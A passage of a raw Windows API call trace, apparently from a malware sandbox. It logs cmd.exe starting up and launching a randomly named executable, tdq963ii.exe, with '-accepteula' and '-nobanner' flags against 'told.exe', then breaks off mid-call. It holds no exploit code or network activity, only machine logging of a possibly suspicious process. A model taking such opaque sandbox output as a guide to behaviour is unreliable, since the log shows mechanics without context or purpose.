dwLength=0x1c | out: lpBuffer=0x43f6e4*(BaseAddress=0x43f000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.879] VirtualQuery (in: lpAddress=0x340000, lpBuffer=0x43f6e4, dwLength=0x1c | out: lpBuffer=0x43f6e4*(BaseAddress=0x340000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.879] VirtualQuery (in: lpAddress=0x341000, lpBuffer=0x43f6e4, dwLength=0x1c | out: lpBuffer=0x43f6e4*(BaseAddress=0x341000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.879] VirtualQuery (in: lpAddress=0x343000, lpBuffer=0x43f6e4, dwLength=0x1c | out: lpBuffer=0x43f6e4*(BaseAddress=0x343000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.879] VirtualQuery (in: lpAddress=0x440000, lpBuffer=0x43f6e4, dwLength=0x1c | out: lpBuffer=0x43f6e4*(BaseAddress=0x440000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0231.879] GetConsoleOutputCP () returned 0x1b5 [0231.880] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0231.880] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0231.880] _get_osfhandle (_FileHandle=1) returned 0x80 [0231.880] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0231.880] _get_osfhandle (_FileHandle=1) returned 0x80 [0231.880] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0231.880] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.880] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0231.881] GetEnvironmentStringsW () returned 0x4d21c0* [0231.881] GetProcessHeap () returned 0x4c0000 [0231.881] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xb78) returned 0x4d2d40 [0231.881] FreeEnvironmentStringsW (penv=0x4d21c0) returned 1 [0231.881] GetProcessHeap () returned 0x4c0000 [0231.881] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4) returned 0x4d18a0 [0231.881] GetEnvironmentStringsW () returned 0x4d21c0* [0231.881] GetProcessHeap () returned 0x4c0000 [0231.881] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xb78) returned 0x4d38c0 [0231.881] FreeEnvironmentStringsW (penv=0x4d21c0) returned 1 [0231.881] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x43e684 | out: phkResult=0x43e684*=0x68) returned 0x0 [0231.882] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x43e68c, lpData=0x43e690, lpcbData=0x43e688*=0x1000 | out: lpType=0x43e68c*=0x0, lpData=0x43e690*=0x0, lpcbData=0x43e688*=0x1000) returned 0x2 [0231.882] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x43e68c, lpData=0x43e690, lpcbData=0x43e688*=0x1000 | out: lpType=0x43e68c*=0x4, lpData=0x43e690*=0x1, lpcbData=0x43e688*=0x4) returned 0x0 [0231.882] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x43e68c, lpData=0x43e690, lpcbData=0x43e688*=0x1000 | out: lpType=0x43e68c*=0x0, lpData=0x43e690*=0x1, lpcbData=0x43e688*=0x1000) returned 0x2 [0231.882] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x43e68c, lpData=0x43e690, lpcbData=0x43e688*=0x1000 | out: lpType=0x43e68c*=0x4, lpData=0x43e690*=0x0, lpcbData=0x43e688*=0x4) returned 0x0 [0231.882] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x43e68c, lpData=0x43e690, lpcbData=0x43e688*=0x1000 | out: lpType=0x43e68c*=0x4, lpData=0x43e690*=0x40, lpcbData=0x43e688*=0x4) returned 0x0 [0231.882] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x43e68c, lpData=0x43e690, lpcbData=0x43e688*=0x1000 | out: lpType=0x43e68c*=0x4, lpData=0x43e690*=0x40, lpcbData=0x43e688*=0x4) returned 0x0 [0231.882] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x43e68c, lpData=0x43e690, lpcbData=0x43e688*=0x1000 | out: lpType=0x43e68c*=0x0, lpData=0x43e690*=0x40, lpcbData=0x43e688*=0x1000) returned 0x2 [0231.882] RegCloseKey (hKey=0x68) returned 0x0 [0231.882] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x43e684 | out: phkResult=0x43e684*=0x68) returned 0x0 [0231.882] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x43e68c, lpData=0x43e690, lpcbData=0x43e688*=0x1000 | out: lpType=0x43e68c*=0x0, lpData=0x43e690*=0x40, lpcbData=0x43e688*=0x1000) returned 0x2 [0231.882] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x43e68c, lpData=0x43e690, lpcbData=0x43e688*=0x1000 | out: lpType=0x43e68c*=0x4, lpData=0x43e690*=0x1, lpcbData=0x43e688*=0x4) returned 0x0 [0231.882] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x43e68c, lpData=0x43e690, lpcbData=0x43e688*=0x1000 | out: lpType=0x43e68c*=0x0, lpData=0x43e690*=0x1, lpcbData=0x43e688*=0x1000) returned 0x2 [0231.882] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x43e68c, lpData=0x43e690, lpcbData=0x43e688*=0x1000 | out: lpType=0x43e68c*=0x4, lpData=0x43e690*=0x0, lpcbData=0x43e688*=0x4) returned 0x0 [0231.882] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x43e68c, lpData=0x43e690, lpcbData=0x43e688*=0x1000 | out: lpType=0x43e68c*=0x4, lpData=0x43e690*=0x9, lpcbData=0x43e688*=0x4) returned 0x0 [0231.882] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x43e68c, lpData=0x43e690, lpcbData=0x43e688*=0x1000 | out: lpType=0x43e68c*=0x4, lpData=0x43e690*=0x9, lpcbData=0x43e688*=0x4) returned 0x0 [0231.882] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x43e68c, lpData=0x43e690, lpcbData=0x43e688*=0x1000 | out: lpType=0x43e68c*=0x0, lpData=0x43e690*=0x9, lpcbData=0x43e688*=0x1000) returned 0x2 [0231.883] RegCloseKey (hKey=0x68) returned 0x0 [0231.883] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2ff [0231.883] srand (_Seed=0x5f51e2ff) [0231.883] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"told.exe\" -nobanner" [0231.883] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"told.exe\" -nobanner" [0231.883] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0231.884] GetProcessHeap () returned 0x4c0000 [0231.884] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x210) returned 0x4d21c0 [0231.884] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4d21c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0231.884] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.884] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.884] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0231.885] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.885] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.885] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.885] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.885] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.885] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.885] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.885] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.885] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.885] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.885] GetProcessHeap () returned 0x4c0000 [0231.885] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x54) returned 0x4d23d8 [0231.885] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x43f450 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0231.885] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x43f450, lpFilePart=0x43f44c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x43f44c*="Desktop") returned 0x25 [0231.885] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0231.885] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x43f1cc | out: lpFindFileData=0x43f1cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4d2040 [0231.885] FindClose (in: hFindFile=0x4d2040 | out: hFindFile=0x4d2040) returned 1 [0231.885] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x43f1cc | out: lpFindFileData=0x43f1cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4d2040 [0231.885] FindClose (in: hFindFile=0x4d2040 | out: hFindFile=0x4d2040) returned 1 [0231.886] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0231.886] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x43f1cc | out: lpFindFileData=0x43f1cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4d2040 [0231.886] FindClose (in: hFindFile=0x4d2040 | out: hFindFile=0x4d2040) returned 1 [0231.886] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0231.886] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0231.886] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0231.886] GetProcessHeap () returned 0x4c0000 [0231.886] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d2d40 | out: hHeap=0x4c0000) returned 1 [0231.886] GetEnvironmentStringsW () returned 0x4d4440* [0231.886] GetProcessHeap () returned 0x4c0000 [0231.886] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xb78) returned 0x4d2c38 [0231.886] FreeEnvironmentStringsW (penv=0x4d4440) returned 1 [0231.886] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0231.886] GetProcessHeap () returned 0x4c0000 [0231.886] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d23d8 | out: hHeap=0x4c0000) returned 1 [0231.886] GetProcessHeap () returned 0x4c0000 [0231.886] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x400e) returned 0x4d4440 [0231.887] GetProcessHeap () returned 0x4c0000 [0231.887] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x68) returned 0x4d37b8 [0231.887] GetProcessHeap () returned 0x4c0000 [0231.887] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d4440 | out: hHeap=0x4c0000) returned 1 [0231.887] GetConsoleOutputCP () returned 0x1b5 [0231.887] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0231.887] GetUserDefaultLCID () returned 0x409 [0231.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0231.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x43f590, cchData=128 | out: lpLCData="0") returned 2 [0231.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x43f590, cchData=128 | out: lpLCData="0") returned 2 [0231.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x43f590, cchData=128 | out: lpLCData="1") returned 2 [0231.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0231.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0231.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0231.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0231.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0231.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0231.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0231.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0231.888] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0231.888] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0231.888] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0231.890] GetProcessHeap () returned 0x4c0000 [0231.890] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x20c) returned 0x4d4440 [0231.890] GetConsoleTitleW (in: lpConsoleTitle=0x4d4440, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.890] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0231.890] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0231.890] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0231.890] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0231.892] GetProcessHeap () returned 0x4c0000 [0231.892] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x400a) returned 0x4d4658 [0231.892] GetProcessHeap () returned 0x4c0000 [0231.892] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d4658 | out: hHeap=0x4c0000) returned 1 [0231.893] _wcsicmp (_String1="tdq963ii.exe", _String2=")") returned 75 [0231.893] _wcsicmp (_String1="FOR", _String2="tdq963ii.exe") returned -14 [0231.893] _wcsicmp (_String1="FOR/?", _String2="tdq963ii.exe") returned -14 [0231.893] _wcsicmp (_String1="IF", _String2="tdq963ii.exe") returned -11 [0231.893] _wcsicmp (_String1="IF/?", _String2="tdq963ii.exe") returned -11 [0231.893] _wcsicmp (_String1="REM", _String2="tdq963ii.exe") returned -2 [0231.893] _wcsicmp (_String1="REM/?", _String2="tdq963ii.exe") returned -2 [0231.893] GetProcessHeap () returned 0x4c0000 [0231.893] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x58) returned 0x4d23d8 [0231.893] GetProcessHeap () returned 0x4c0000 [0231.893] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x22) returned 0x4d3828 [0231.894] GetProcessHeap () returned 0x4c0000 [0231.894] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4c) returned 0x4d3858 [0231.895] GetConsoleTitleW (in: lpConsoleTitle=0x43f288, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.896] GetFileAttributesW (lpFileName="tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x20 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0231.896] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0231.897] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0231.898] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0231.899] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0231.899] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0231.899] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0231.899] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0231.899] _wcsicmp (_String1="tdq963ii.exe", _String2="FOR") returned 14 [0231.899] _wcsicmp (_String1="tdq963ii.exe", _String2="IF") returned 11 [0231.899] _wcsicmp (_String1="tdq963ii.exe", _String2="REM") returned 2 [0231.899] GetProcessHeap () returned 0x4c0000 [0231.899] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x210) returned 0x4d4658 [0231.899] GetProcessHeap () returned 0x4c0000 [0231.899] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x66) returned 0x4d4870 [0231.899] _wcsnicmp (_String1="tdq9", _String2="cmd ", _MaxCount=0x4) returned 17 [0231.900] GetProcessHeap () returned 0x4c0000 [0231.900] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x418) returned 0x4d48e0 [0231.900] SetErrorMode (uMode=0x0) returned 0x0 [0231.900] SetErrorMode (uMode=0x1) returned 0x0 [0231.900] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4d48e8, lpFilePart=0x43eda8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x43eda8*="Desktop") returned 0x25 [0231.900] SetErrorMode (uMode=0x0) returned 0x1 [0231.900] GetProcessHeap () returned 0x4c0000 [0231.900] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, Ptr=0x4d48e0, Size=0x6e) returned 0x4d48e0 [0231.900] GetProcessHeap () returned 0x4c0000 [0231.900] RtlSizeHeap (HeapHandle=0x4c0000, Flags=0x0, MemoryPointer=0x4d48e0) returned 0x6e [0231.900] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.900] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0231.900] GetProcessHeap () returned 0x4c0000 [0231.900] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x120) returned 0x4d4958 [0231.900] GetProcessHeap () returned 0x4c0000 [0231.900] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x238) returned 0x4d4a80 [0231.911] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0231.912] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x43eb44, fSearchOp=0x0, 